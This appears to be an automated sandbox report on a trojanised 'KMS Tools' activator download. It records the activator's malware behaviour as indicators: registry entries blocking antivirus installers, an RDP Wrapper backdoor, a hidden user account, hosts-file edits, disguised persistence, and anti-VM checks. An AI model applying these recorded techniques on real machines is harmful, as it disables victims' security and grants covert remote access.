Analysis Overview
Threat Level: Known bad
The file https://kms-auto.site/windows-10-activator/ was found to be: Known bad.
Malicious Activity Summary
RMS
Rms family
Detected Nirsoft tools
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
Modifies Windows Firewall
Stops running service(s)
Blocks application from running via registry modification
Drops file in Drivers directory
Server Software Component: Terminal Services DLL
Themida packer
Checks BIOS information in registry
Checks computer location settings
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Adds Run key to start application
Modifies WinLogon
Looks up external IP address via web service
Checks whether UAC is enabled
Drops file in System32 directory
Hide Artifacts: Hidden Users
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Permission Groups Discovery: Local Groups
Event Triggered Execution: Netsh Helper DLL
Runs net.exe
Delays execution with timeout.exe
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Checks processor information in registry
NTFS ADS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of FindShellTrayWindow
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Suspicious behavior: LoadsDriver
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-04-19 20:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-19 20:52
Reported
2025-04-19 21:05
Platform
win10ltsc2021-20250410-en
Max time kernel
751s
Max time network
752s
Command Line
Signatures
RMS
Rms family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\KMS.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\IP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\Setup\smss.exe | N/A |
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\26 = "eset_smart_security_premium_live_installer.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe" | C:\ProgramData\Setup\KMS.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\ProgramData\Setup\update.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\ProgramData\RDPWinst.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\IP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\KMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\IP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\KMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Setup\update.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\update.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Windows Tasks Service\winserv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Setup\install.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\Setup\IP.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\KMS.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\update.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\IP.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Setup\smss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\SysWOW64\unsecapp.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDPWinst.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\unsecapp.exe | C:\ProgramData\Setup\IP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\unsecapp.exe | C:\ProgramData\Setup\IP.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\KMS Tools Lite Portable\KMSTools Lite.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\KMS.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\update.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\IP.exe | N/A |
| N/A | N/A | C:\ProgramData\Setup\smss.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\unsecapp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\unsecapp.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft JDX | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVAST Software | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Doctor Web | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\McAfee | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Loaris Trojan Remover | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\IObit\Advanced SystemCare | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Moo0 | C:\ProgramData\Setup\update.exe | N/A |
| File created | C:\Program Files\Common Files\System\iediagcmd.exe | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kaspersky Lab | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Cezurity | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Process Lasso | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\Process Hacker 2 | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\EnigmaSoft | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\QuickCPU | C:\ProgramData\Setup\update.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpyHunter | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\AVAST Software | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Transmission | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\RogueKiller | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\CPUID\HWMonitor | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\ReasonLabs | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\Setup\smss.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDPWinst.exe | N/A |
| File opened for modification | C:\Program Files\COMODO | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVG | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files\DrWeb | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpeedFan | C:\ProgramData\Setup\update.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GPU Temp | C:\ProgramData\Setup\update.exe | N/A |
